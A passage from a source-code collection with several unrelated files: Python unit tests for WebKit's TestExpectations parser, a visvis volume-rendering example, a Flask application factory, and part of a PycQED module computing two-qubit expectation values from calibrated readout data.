self.assertRaises(ParseError, self.check, expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None, skips=['failures/expected/text.html'], lint=True)
def test_skipped_file_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected'])
def test_skipped_file_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected'])
def test_skipped_entry_dont_exist(self):
port = MockHost().port_factory.get('qt')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = ''
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(['foo/bar/baz.html'])
capture = OutputCapture()
capture.capture_output()
exp = TestExpectations(port)
_, _, logs = capture.restore_output()
self.assertEqual('The following test foo/bar/baz.html from the Skipped list doesn\'t exist\n', logs)
class ExpectationSyntaxTests(Base):
def test_unrecognized_expectation(self):
self.assert_bad_expectations('Bug(test) failures/expected/text.html [ Unknown ]')
def test_macro(self):
exp_str = 'Bug(test) [ Win ] failures/expected/text.html [ Failure ]'
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
def assert_tokenize_exp(self, line, bugs=None, modifiers=None, expectations=None, warnings=None, comment=None, name='foo.html'):
bugs = bugs or []
modifiers = modifiers or []
expectations = expectations or []
warnings = warnings or []
filename = 'TestExpectations'
line_number = 1
expectation_line = TestExpectationParser._tokenize_line(filename, line, line_number)
self.assertEqual(expectation_line.warnings, warnings)
self.assertEqual(expectation_line.name, name)
self.assertEqual(expectation_line.filename, filename)
self.assertEqual(expectation_line.line_number, line_number)
if not warnings:
self.assertEqual(expectation_line.modifiers, modifiers)
self.assertEqual(expectation_line.expectations, expectations)
def test_bare_name(self):
self.assert_tokenize_exp('foo.html', modifiers=['SKIP'], expectations=['PASS'])
def test_bare_name_and_bugs(self):
self.assert_tokenize_exp('webkit.org/b/12345 foo.html', modifiers=['BUGWK12345', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('Bug(dpranke) foo.html', modifiers=['BUGDPRANKE', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('webkit.org/b/12345 webkit.org/b/34567 foo.html', modifiers=['BUGWK12345', 'BUGWK34567', 'SKIP'], expectations=['PASS'])
def test_comments(self):
self.assert_tokenize_exp("# comment", name=None, comment="# comment")
self.assert_tokenize_exp("foo.html # comment", comment="# comment", expectations=['PASS'], modifiers=['SKIP'])
def test_config_modifiers(self):
self.assert_tokenize_exp('[ Mac ] foo.html', modifiers=['MAC', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('[ Mac Vista ] foo.html', modifiers=['MAC', 'VISTA', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('[ Mac ] foo.html [ Failure ] ', modifiers=['MAC'], expectations=['FAIL'])
def test_unknown_config(self):
self.assert_tokenize_exp('[ Foo ] foo.html ', modifiers=['Foo', 'SKIP'], expectations=['PASS'])
def test_unknown_expectation(self):
self.assert_tokenize_exp('foo.html [ Audio ]', warnings=['Unrecognized expectation "Audio"'])
def test_skip(self):
self.assert_tokenize_exp('foo.html [ Skip ]', modifiers=['SKIP'], expectations=['PASS'])
def test_slow(self):
self.assert_tokenize_exp('foo.html [ Slow ]', modifiers=['SLOW'], expectations=['PASS'])
def test_wontfix(self):
self.assert_tokenize_exp('foo.html [ WontFix ]', modifiers=['WONTFIX', 'SKIP'], expectations=['PASS'])
self.assert_tokenize_exp('foo.html [ WontFix ImageOnlyFailure ]', modifiers=['WONTFIX'], expectations=['IMAGE'])
self.assert_tokenize_exp('foo.html [ WontFix Pass Failure ]', modifiers=['WONTFIX'], expectations=['PASS', 'FAIL'])
def test_blank_line(self):
self.assert_tokenize_exp('', name=None)
def test_warnings(self):
self.assert_tokenize_exp('[ Mac ]', warnings=['Did not find a test name.'], name=None)
self.assert_tokenize_exp('[ [', warnings=['unexpected "["'], name=None)
self.assert_tokenize_exp('webkit.org/b/12345 ]', warnings=['unexpected "]"'], name=None)
self.assert_tokenize_exp('foo.html webkit.org/b/12345 ]', warnings=['"webkit.org/b/12345" is not at the start of the line.'])
class SemanticTests(Base):
def test_bug_format(self):
self.assertRaises(ParseError, self.parse_exp, 'BUG1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
def test_bad_bugid(self):
try:
self.parse_exp('BUG1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
self.fail('should have raised an error about a bad bug identifier')
except ParseError, exp:
self.assertEqual(len(exp.warnings), 1)
def test_missing_bugid(self):
self.parse_exp('failures/expected/text.html [ Failure ]')
self.assertFalse(self._exp.has_warnings())
self._port.warn_if_bug_missing_in_test_expectations = lambda: True
self.parse_exp('failures/expected/text.html [ Failure ]')
line = self._exp._model.get_expectation_line('failures/expected/text.html')
self.assertFalse(line.is_invalid())
self.assertEqual(line.warnings, ['Test lacks BUG modifier.'])
def test_skip_and_wontfix(self):
# Skip is not allowed to have other expectations as well, because those
# expectations won't be exercised and may become stale .
self.parse_exp('failures/expected/text.html [ Failure Skip ]')
self.assertTrue(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Crash WontFix ]')
self.assertFalse(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Pass WontFix ]')
self.assertFalse(self._exp.has_warnings())
def test_slow_and_timeout(self):
# A test cannot be SLOW and expected to TIMEOUT.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) failures/expected/timeout.html [ Slow Timeout ]', is_lint_mode=True)
def test_rebaseline(self):
# Can't lint a file w/ 'REBASELINE' in it.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) failures/expected/text.html [ Failure Rebaseline ]',
is_lint_mode=True)
def test_duplicates(self):
self.assertRaises(ParseError, self.parse_exp, """
Bug(exp) failures/expected/text.html [ Failure ]
Bug(exp) failures/expected/text.html [ ImageOnlyFailure ]""", is_lint_mode=True)
self.assertRaises(ParseError, self.parse_exp,
self.get_basic_expectations(), overrides="""
Bug(override) failures/expected/text.html [ Failure ]
Bug(override) failures/expected/text.html [ ImageOnlyFailure ]""", is_lint_mode=True)
def test_missing_file(self):
self.parse_exp('Bug(test) missing_file.html [ Failure ]')
self.assertTrue(self._exp.has_warnings(), 1)
class PrecedenceTests(Base):
def test_file_over_directory(self):
# This tests handling precedence of specific lines over directories
# and tests expectations covering entire directories.
exp_str = """
Bug(x) failures/expected/text.html [ Failure ]
Bug(y) failures/expected [ WontFix ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp('failures/expected/crash.html', PASS)
exp_str = """
Bug(x) failures/expected [ WontFix ]
Bug(y) failures/expected/text.html [ Failure ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp('failures/expected/crash.html', PASS)
def test_ambiguous(self):
self.assert_bad_expectations("Bug(test) [ Release ] passes/text.html [ Pass ]\n"
"Bug(test) [ Win ] passes/text.html [ Failure ]\n")
def test_more_modifiers(self):
self.assert_bad_expectations("Bug(test) [ Release ] passes/text.html [ Pass ]\n"
"Bug(test) [ Win Release ] passes/text.html [ Failure ]\n")
def test_order_in_file(self):
self.assert_bad_expectations("Bug(test) [ Win Release ] : passes/text.html [ Failure ]\n"
"Bug(test) [ Release ] : passes/text.html [ Pass ]\n")
def test_macro_overrides(self):
self.assert_bad_expectations("Bug(test) [ Win ] passes/text.html [ Pass ]\n"
"Bug(test) [ XP ] passes/text.html [ Failure ]\n")
class RemoveConfigurationsTest(Base):
def test_remove(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {"expectations": """Bug(x) [ Linux Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port, self.get_basic_tests())
actual_expectations = expectations.remove_configuration_from_test('failures/expected/foo.html', test_config)
self.assertEqual("""Bug(x) [ Linux Vista Win7 Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configuration_from_test('failures/expected/foo.html', test_config)
actual_expectations = expectations.remove_configuration_from_test('failures/expected/foo.html', host.port_factory.get('test-win-vista', None).test_configuration())
actual_expectations = expectations.remove_configuration_from_test('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
class RebaseliningTest(Base):
"""Test rebaselining-specific functionality."""
def assertRemove(self, input_expectations, input_overrides, tests, expected_expectations, expected_overrides):
self.parse_exp(input_expectations, is_lint_mode=False, overrides=input_overrides)
actual_expectations = self._exp.remove_rebaselined_tests(tests, 'expectations')
self.assertEqual(expected_expectations, actual_expectations)
actual_overrides = self._exp.remove_rebaselined_tests(tests, 'overrides')
self.assertEqual(expected_overrides, actual_overrides)
def test_remove(self):
self.assertRemove('Bug(x) failures/expected/text.html [ Failure Rebaseline ]\n'
'Bug(y) failures/expected/image.html [ ImageOnlyFailure Rebaseline ]\n'
'Bug(z) failures/expected/crash.html [ Crash ]\n',
'Bug(x0) failures/expected/image.html [ Crash ]\n',
['failures/expected/text.html'],
'Bug(y) failures/expected/image.html [ ImageOnlyFailure Rebaseline ]\n'
'Bug(z) failures/expected/crash.html [ Crash ]\n',
'Bug(x0) failures/expected/image.html [ Crash ]\n')
# Ensure that we don't modify unrelated lines, even if we could rewrite them.
# i.e., the second line doesn't get rewritten to "Bug(y) failures/expected/skip.html"
self.assertRemove('Bug(x) failures/expected/text.html [ Failure Rebaseline ]\n'
'Bug(Y) failures/expected/image.html [ Skip ]\n'
'Bug(z) failures/expected/crash.html\n',
'',
['failures/expected/text.html'],
'Bug(Y) failures/expected/image.html [ Skip ]\n'
'Bug(z) failures/expected/crash.html\n',
'')
def test_get_rebaselining_failures(self):
# Make sure we find a test as needing a rebaseline even if it is not marked as a failure.
self.parse_exp('Bug(x) failures/expected/text.html [ Rebaseline ]\n')
self.assertEqual(len(self._exp.get_rebaselining_failures()), 1)
self.parse_exp(self.get_basic_expectations())
self.assertEqual(len(self._exp.get_rebaselining_failures()), 0)
class TestExpectationSerializationTests(unittest.TestCase):
def __init__(self, testFunc):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
self._converter = TestConfigurationConverter(test_port.all_test_configurations(), test_port.configuration_specifier_macros())
unittest.TestCase.__init__(self, testFunc)
def _tokenize(self, line):
return TestExpectationParser._tokenize_line('path', line, 0)
def assert_round_trip(self, in_string, expected_string=None):
expectation = self._tokenize(in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, expectation.to_string(self._converter))
def assert_list_round_trip(self, in_string, expected_string=None):
host = MockHost()
parser = TestExpectationParser(host.port_factory.get('test-win-xp', None), [], allow_rebaseline_modifier=False)
expectations = parser.parse('path', in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, TestExpectations.list_to_string(expectations, self._converter))
def test_unparsed_to_string(self):
expectation = TestExpectationLine()
self.assertEqual(expectation.to_string(self._converter), '')
expectation.comment = ' Qux.'
self.assertEqual(expectation.to_string(self._converter), '# Qux.')
expectation.name = 'bar'
self.assertEqual(expectation.to_string(self._converter), 'bar # Qux.')
expectation.modifiers = ['foo']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar # Qux.')
expectation.expectations = ['bAz']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ ] # Qux.')
expectation.expectations = ['bAz1', 'baZ2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.modifiers = ['foo1', 'foO2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO1 FOO2 ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.warnings.append('Oh the horror.')
self.assertEqual(expectation.to_string(self._converter), '')
expectation.original_string = 'Yes it is!'
self.assertEqual(expectation.to_string(self._converter), 'Yes it is!')
def test_unparsed_list_to_string(self):
expectation = TestExpectationLine()
expectation.comment = 'Qux.'
expectation.name = 'bar'
expectation.modifiers = ['foo']
expectation.expectations = ['bAz1', 'baZ2']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(TestExpectations.list_to_string([expectation]), '[ FOO ] bar [ BAZ1 BAZ2 ] #Qux.')
def test_parsed_to_string(self):
expectation_line = TestExpectationLine()
expectation_line.parsed_bug_modifiers = ['BUGX']
expectation_line.name = 'test/name/for/realz.html'
expectation_line.parsed_expectations = set([IMAGE])
self.assertEqual(expectation_line.to_string(self._converter), None)
expectation_line.matching_configurations = set([TestConfiguration('xp', 'x86', 'release')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ XP Release ] test/name/for/realz.html [ ImageOnlyFailure ]')
expectation_line.matching_configurations = set([TestConfiguration('xp', 'x86', 'release'), TestConfiguration('xp', 'x86', 'debug')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ XP ] test/name/for/realz.html [ ImageOnlyFailure ]')
def test_serialize_parsed_expectations(self):
expectation_line = TestExpectationLine()
expectation_line.parsed_expectations = set([])
parsed_expectation_to_string = dict([[parsed_expectation, expectation_string] for expectation_string, parsed_expectation in TestExpectations.EXPECTATIONS.items()])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), '')
expectation_line.parsed_expectations = set([FAIL])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'fail')
expectation_line.parsed_expectations = set([PASS, IMAGE])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'pass image')
expectation_line.parsed_expectations = set([FAIL, PASS])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'pass fail')
def test_serialize_parsed_modifier_string(self):
expectation_line = TestExpectationLine()
expectation_line.parsed_bug_modifiers = ['garden-o-matic']
expectation_line.parsed_modifiers = ['for', 'the']
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, []), 'garden-o-matic for the')
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, ['win']), 'garden-o-matic for the win')
expectation_line.parsed_bug_modifiers = []
expectation_line.parsed_modifiers = []
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, []), '')
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, ['win']), 'win')
expectation_line.parsed_bug_modifiers = ['garden-o-matic', 'total', 'is']
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, ['win']), 'garden-o-matic is total win')
expectation_line.parsed_bug_modifiers = []
expectation_line.parsed_modifiers = ['garden-o-matic', 'total', 'is']
self.assertEqual(expectation_line._serialize_parsed_modifiers(self._converter, ['win']), 'garden-o-matic is total win')
def test_format_line(self):
self.assertEqual(TestExpectationLine._format_line(['MODIFIERS'], 'name', ['EXPECTATIONS'], 'comment'), '[ MODIFIERS ] name [ EXPECTATIONS ] #comment')
self.assertEqual(TestExpectationLine._format_line(['MODIFIERS'], 'name', ['EXPECTATIONS'], None), '[ MODIFIERS ] name [ EXPECTATIONS ]')
def test_string_roundtrip(self):
self.assert_round_trip('')
self.assert_round_trip('FOO')
self.assert_round_trip('[')
self.assert_round_trip('FOO [')
self.assert_round_trip('FOO ] bar')
self.assert_round_trip(' FOO [')
self.assert_round_trip(' [ FOO ] ')
self.assert_round_trip('[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] ] ] bar BAZ')
self.assert_round_trip('[ FOO ] ] ] bar [ BAZ ]')
self.assert_round_trip('FOO ] ] bar ==== BAZ')
self.assert_round_trip('=')
self.assert_round_trip('#')
self.assert_round_trip('# ')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo :')
self.assert_round_trip('# Foo : =')
def test_list_roundtrip(self):
self.assert_list_round_trip('')
self.assert_list_round_trip('\n')
self.assert_list_round_trip('\n\n')
self.assert_list_round_trip('bar')
self.assert_list_round_trip('bar\n# Qux.')
self.assert_list_round_trip('bar\n# Qux.\n')
def test_reconstitute_only_these(self):
lines = []
reconstitute_only_these = []
def add_line(matching_configurations, reconstitute):
expectation_line = TestExpectationLine()
expectation_line.original_string = "Nay"
expectation_line.parsed_bug_modifiers = ['BUGX']
expectation_line.name = 'Yay'
expectation_line.parsed_expectations = set([IMAGE])
expectation_line.matching_configurations = matching_configurations
lines.append(expectation_line)
if reconstitute:
reconstitute_only_these.append(expectation_line)
add_line(set([TestConfiguration('xp', 'x86', 'release')]), True)
add_line(set([TestConfiguration('xp', 'x86', 'release'), TestConfiguration('xp', 'x86', 'debug')]), False)
serialized = TestExpectations.list_to_string(lines, self._converter)
self.assertEqual(serialized, "Bug(x) [ XP Release ] Yay [ ImageOnlyFailure ]\nBug(x) [ XP ] Yay [ ImageOnlyFailure ]")
serialized = TestExpectations.list_to_string(lines, self._converter, reconstitute_only_these=reconstitute_only_these)
self.assertEqual(serialized, "Bug(x) [ XP Release ] Yay [ ImageOnlyFailure ]\nNay")
def disabled_test_string_whitespace_stripping(self):
# FIXME: Re-enable this test once we rework the code to no longer support the old syntax.
self.assert_round_trip('\n', '')
self.assert_round_trip(' [ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
|
pbfy0/visvis.dev
|
refs/heads/master
|
examples/volumes.py
|
8
|
#!/usr/bin/env python
import visvis as vv
import numpy as np
app = vv.use()
vv.clf()
# create volume
vol = vv.aVolume(size=64)
# set labels
vv.xlabel('x axis')
vv.ylabel('y axis')
vv.zlabel('z axis')
# show
t = vv.volshow(vol, renderStyle='mip')
# try the differtent render styles, for examample
# "t.renderStyle='iso'" or "t.renderStyle='ray'"
# If the drawing hangs, your video drived decided to render in software mode.
# This is unfortunately (as far as I know) not possible to detect.
# It might help if your data is shaped a power of 2.
# Get axes and set camera to orthographic mode (with a field of view of 70)
a = vv.gca()
a.camera.fov = 45
# Create colormap editor wibject.
vv.ColormapEditor(a)
# Start app
app.Run()
|
DFoly/Blogg
|
refs/heads/master
|
app/__init__.py
|
5
|
from flask import Flask
from flask_bootstrap import Bootstrap
from flask_mail import Mail
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_pagedown import PageDown
from config import config
bootstrap = Bootstrap()
mail = Mail()
moment = Moment()
db = SQLAlchemy()
pagedown = PageDown()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
mail.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
pagedown.init_app(app)
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
return app
|
DiCarloLab-Delft/PycQED_py3
|
refs/heads/develop
|
pycqed/analysis_v2/VQE_EVC_2.py
|
1
|
import time
import numpy as np
from pycqed.analysis import analysis_toolbox as a_tools
import pycqed.analysis_v2.base_analysis as ba
# import dataprep for tomography module
# import tomography module
# using the data prep module of analysis V2
# from pycqed.analysis_v2 import tomography_dataprep as dataprep
from pycqed.analysis import measurement_analysis as ma
try:
import qutip as qt
except ImportError as e:
pass
# logging.warning('Could not import qutip, tomo code will not work')
def reshape_block(shots_data, segments_per_block=16, block_size=4092, mode='truncate'):
"""
inputs: shots_data 1D array of dimension N
organizes data in blocks of dimension block_size.
num of blocks is N/block_size
"""
N = len(shots_data)
# Data dimension needs to be an integer multiple of block_size
assert(N%block_size==0)
num_blocks = N//block_size
full_segments = block_size//segments_per_block
orfan_segments = block_size % segments_per_block
missing_segments = segments_per_block - orfan_segments
# print(N,num_blocks,full_segments,orfan_segments,missing_segments)
reshaped_data = shots_data.reshape((num_blocks,block_size))
if mode.lower()=='truncate':
truncate_idx = full_segments*segments_per_block
return reshaped_data[:,:truncate_idx]
elif mode.lower()=='padd':
padd_dim = (full_segments+1)*segments_per_block
return_block = np.nan*np.ones((num_blocks,padd_dim))
return_block[:,:block_size] = reshaped_data
return return_block
else:
raise ValueError('Mode not understood. Needs to be truncate or padd')
def all_repetitions(shots_data,segments_per_block=16):
flat_dim = shots_data.shape[0]*shots_data.shape[1]
# Data dimension needs to divide the segments_per_block
assert(flat_dim%segments_per_block==0)
num_blocks = flat_dim // segments_per_block
block_data = shots_data.reshape((num_blocks,segments_per_block))
return block_data
def get_segments_average(shots_data, segments_per_block=16, block_size=4092, mode='truncate', average=True):
reshaped_data = reshape_block(shots_data=shots_data,
segments_per_block=segments_per_block,
block_size=block_size,
mode=mode)
all_reps = all_repetitions(shots_data=reshaped_data,
segments_per_block=segments_per_block)
if average:
return np.mean(all_reps,axis=0)
else:
return all_reps
class ExpectationValueCalculation_mmt_computer:
def __init__(self, auto=True, label='', timestamp=None,
fig_format='png',
q0_label='q0',
q1_label='q1', close_fig=True, **kw):
self.label = label
self.timestamp = timestamp
self.fig_format = fig_format
# q0 == D2
self.q0_label = q0_label
# q1 == A
self.q1_label = q1_label
self.n_states = 2 ** 2
self.ma_obj = ma.MeasurementAnalysis(auto=False, label=label,
timestamp=timestamp)
self.ma_obj.get_naming_and_values()
# self.get_naming_and_values()
# hard coded number of segments for a 2 qubit state tomography
# constraint imposed by UHFLI
self.nr_segments = 16
# self.exp_name = os.path.split(self.folder)[-1][7:]
avg_h1 = self.ma_obj.measured_values[0]
avg_h2 = self.ma_obj.measured_values[1]
avg_h12 = self.ma_obj.measured_values[2]
h1_00 = np.mean(avg_h1[36:36+7])
h1_01 = np.mean(avg_h1[43:43+7])
h1_10 = np.mean(avg_h1[50:50+7])
h1_11 = np.mean(avg_h1[57:])
h2_00 = np.mean(avg_h2[36:36+7])
h2_01 = np.mean(avg_h2[43:43+7])
h2_10 = np.mean(avg_h2[50:50+7])
h2_11 = np.mean(avg_h2[57:])
h12_00 = np.mean(avg_h12[36:36+7])
h12_01 = np.mean(avg_h12[43:43+7])
h12_10 = np.mean(avg_h12[50:50+7])
h12_11 = np.mean(avg_h12[57:])
measurement_channel_1 = np.array([avg_h1[0], avg_h1[1], avg_h1[7],
avg_h1[8], avg_h1[14], avg_h1[21],
avg_h1[28], avg_h1[35]])
measurement_channel_2 = np.array([avg_h2[0], avg_h2[1], avg_h2[7], avg_h2[8],
avg_h2[14], avg_h2[21], avg_h2[28], avg_h2[35]])
measurement_channel_3 = np.array([avg_h12[0], avg_h12[1], avg_h12[7],
avg_h12[8], avg_h12[14], avg_h12[21],
avg_h12[28],avg_h12[35]])
self.measurements_tomo = np.array([measurement_channel_1,
measurement_channel_2,
measurement_channel_3]).flatten()
# print(self.measurements_tomo)
# print(len(self.measurements_tomo))
# 108 x 1
# get the calibration points by averaging over the five measurements
# taken knowing the initial state we put in
self.measurements_cal = np.array(
[h1_00, h1_01, h1_10, h1_11,
h2_00, h2_01, h2_10, h2_11,
h12_00, h12_01, h12_10, h12_11])
def _calibrate_betas(self):
"""
calculates betas from calibration points for the initial measurement
operator
Betas are ordered by B0 -> II B1 -> IZ etc(binary counting)
<0|Z|0> = 1, <1|Z|1> = -1
Keyword arguments:
measurements_cal --- array(2 ** n_qubits) should be ordered
correctly (00, 01, 10, 11) for 2 qubits
"""
cal_matrix = np.zeros((self.n_states, self.n_states))
# get the coefficient matrix for the betas
for i in range(self.n_states):
for j in range(self.n_states):
# perform bitwise AND and count the resulting 1s
cal_matrix[i, j] = (-1)**(bin((i & j)).count("1"))
# invert solve the simple system of equations
# print(cal_matrix)
# print(np.linalg.inv(cal_matrix))
betas = np.zeros(12)
# print(self.measurements_cal[0:4])
betas[0:4] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[0:4])
self.betas_up = betas[0:4]
betas[4:8] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[4:8])
self.betas_p = betas[4:8]
betas[8:] = np.dot(np.linalg.inv(cal_matrix),
self.measurements_cal[8:12])
self.betas_pp = betas[8:]
return betas
def assemble_M_matrix_single_block(self, beta_array):
M_matrix_single_block_row_1 = np.array([beta_array[0], beta_array[1],
beta_array[2], beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_2 = np.array([beta_array[0],
-1*beta_array[1],
beta_array[2],
-1*beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_3 = np.array([beta_array[0],
beta_array[1],
-1*beta_array[2],
-1*beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_4 = np.array([beta_array[0],
-1*beta_array[1],
-1*beta_array[2],
beta_array[3],
0, 0, 0, 0, 0, 0])
M_matrix_single_block_row_5 = np.array([beta_array[0],
0, 0, 0, -beta_array[1],
-beta_array[2],
beta_array[3], 0, 0, 0])
M_matrix_single_block_row_6 = np.array([beta_array[0], 0, 0, 0,
beta_array[1],
beta_array[2],
beta_array[3],
0, 0, 0])
M_matrix_single_block_row_7 = np.array([beta_array[0], 0, 0,
0, 0, 0, 0, beta_array[1],
beta_array[2],
beta_array[3]])
M_matrix_single_block_row_8 = np.array([beta_array[0], 0, 0, 0, 0,
0, 0, -beta_array[1],
-beta_array[2],
beta_array[3]])
M_matrix_single_block = np.vstack((M_matrix_single_block_row_1,
M_matrix_single_block_row_2,
M_matrix_single_block_row_3,
M_matrix_single_block_row_4,
M_matrix_single_block_row_5,
M_matrix_single_block_row_6,
M_matrix_single_block_row_7,
M_matrix_single_block_row_8))
M_matrix_single_block = M_matrix_single_block.reshape(8, 10)
return M_matrix_single_block
def assemble_M_matrix(self):
Block1 = self.assemble_M_matrix_single_block(self.betas_up)
Block2 = self.assemble_M_matrix_single_block(self.betas_p)
Block3 = self.assemble_M_matrix_single_block(self.betas_pp)
self.M_matrix = np.vstack((Block1, Block2, Block3)).reshape(24, 10)
return self.M_matrix
def invert_M_matrix(self):
self.inverse_matrix = np.linalg.pinv(self.M_matrix)
return self.inverse_matrix
def execute_error_signalling(self, ev):
II = (ev[0] - ev[3])/(1 - ev[3])
IZ = (ev[1] - ev[2])/(1 - ev[3])
ZI = (ev[1] - ev[2])/(1 - ev[3])
ZZ = (ev[3] - ev[0])/(1 - ev[3])
XX = (ev[4] + ev[5])/(1 - ev[3])
YY = (ev[4] + ev[5])/(1 - ev[3])
ev_error_signalling = np.array([II, IZ, ZI, ZZ, XX, YY])
return ev_error_signalling
def execute_expectation_value_calculation(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.invert_M_matrix()
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[3],
self.expect_values[6],
self.expect_values[9]])
return expect_values_VQE
def execute_expectation_value_calculation_traceone(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.inverse_matrix = np.linalg.pinv(self.M_matrix[:, 1:])
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([1,
self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[5],
self.expect_values[8]])
return expect_values_VQE
def execute_expectation_value_calculation_T1signaling(self):
# assemble matrix that connects RO with terms
self._calibrate_betas()
self.assemble_M_matrix()
self.inverse_matrix = np.linalg.pinv(self.M_matrix[:, 1:])
# use it to get terms back from RO
rescaled_measurements_tomo = self.measurements_tomo
self.expect_values = np.dot(self.inverse_matrix,
rescaled_measurements_tomo)
expect_values_VQE = np.array([1,
self.expect_values[0],
self.expect_values[1],
self.expect_values[2],
self.expect_values[5],
self.expect_values[8]])
expect_values_VQE = self.execute_error_signalling(expect_values_VQE)
return expect_values_VQE
class ExpectationValueCalculation:
def __init__(self, auto=True, label='', timestamp=None,
fig_format='png',
q0_label='q0',
q1_label='q1', close_fig=True, **kw):
self.label = label
